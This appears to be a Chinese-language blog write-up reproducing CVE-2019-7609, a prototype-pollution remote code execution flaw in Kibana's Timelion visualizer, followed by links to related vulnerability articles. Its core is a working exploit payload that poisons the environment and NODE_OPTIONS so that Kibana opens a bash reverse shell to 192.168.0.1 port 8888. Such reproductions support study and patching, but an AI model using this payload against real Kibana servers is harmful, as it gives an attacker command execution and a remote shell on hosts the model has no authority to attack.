Kibana原型污染导致远程执行代码（CVE-2019-7609）

by ADummy

0x00利用路线

0x01漏洞介绍

Kibana是Elasticsearch的开源数据可视化仪表板。

5.6.15和6.6.1之前的Kibana版本在Timelion可视化工具中包含任意代码执行缺陷。有权访问Timelion应用程序的攻击者可以发送将尝试执行javascript代码的请求。这可能导致攻击者在主机系统上以Kibana进程的权限执行任意命令。

影响版本

Kibana <= 5.6.15
Kibana <= 6.6.1

0x02漏洞复现

在设置环境之前，您需要vm.max_map_count在主机服务器（而不是在Docker容器中）更改为大于262144：

sysctl -w vm.max_map_count=262144

启动环境后，Kibana正在监听http://your-ip:5106。原型污染发生在时间轴可视化器中，在此处填写以下有效负载：

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Kibana原型污染导致远程执行代码 CVE-2019-7609 漏洞复现相关推荐

wordpress漏洞_WordPress XSS漏洞可能导致远程执行代码（RCE）
原作者: Ziyahan Albeniz 在2019年3月13日,专注于静态代码分析软件的RIPS科技公司发布了他们在所有版本的WordPress 5.1.1中发现的跨站点脚本(XSS)漏洞的详细信息 ...
HTTP.sys 远程执行代码验证工具
漏洞信息: 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞.这里将测试工具改成windows版本方便工 ...
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现一.漏洞描述远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HT ...
Log4j2远程执行代码漏洞如何攻击? 又如何修复
Log4j2远程执行代码漏洞如何攻击? 又如何修复 12月9日晚,Apache Log4j2反序列化远程代码执行漏洞细节已被公开,Apache Log4j-2中存在JNDI注入漏洞,当程序将用户输入的 ...
Edge 的 0day 漏洞：可远程执行代码；苹果手机被曝砍单，富士康或被迫裁员
(给技术最前线加星标,每天看技术热点) 转自:开源中国.solidot.cnBeta.腾讯科技.快科技等 [技术资讯] 0.安全专家发现 Edge 的 0day 漏洞:可远程执行代码安全研究专家 Y ...
绿盟科技网络安全威胁周报2017.19 关注Microsoft恶意软件防护引擎远程执行代码漏洞CVE-2017-0290...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-19,绿盟科技漏洞库本周新增75条,其中高危61条.本次周报建议大家关注 Microsoft恶意软件防护引擎远程执行代码漏洞 .目前,微软官方 ...
和远程ip_漏洞Microsoft Windows TCP/IP 远程执行代码漏洞威胁通告
2020年10月14日,中测安华必达实验室技术团队依托监测平台第一时间发现微软公司(Microsoft)披露了Microsoft Windows TCP/IP 远程执行代码漏洞(CVE-2020-16 ...
ie浏览器修复_腾讯安全：IE浏览器曝远程执行代码漏洞腾讯安全强势推出漏洞修复工具...
近日,微软发布一例远程执行代码漏洞(CVE-2019-1367)漏洞修复补丁,攻击者可利用网页挂马和邮件进行攻击,得手后获取用户权限,控制大量系统,造成严重影响.腾讯安全团队自该漏洞安全公告发布之后, ...
【复现】CVE-2015-1635-HTTP.SYS远程执行代码漏洞（ms15-034）
1.1.1 漏洞描述在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 ).利用HTTP. ...

Kibana原型污染导致远程执行代码 CVE-2019-7609 漏洞复现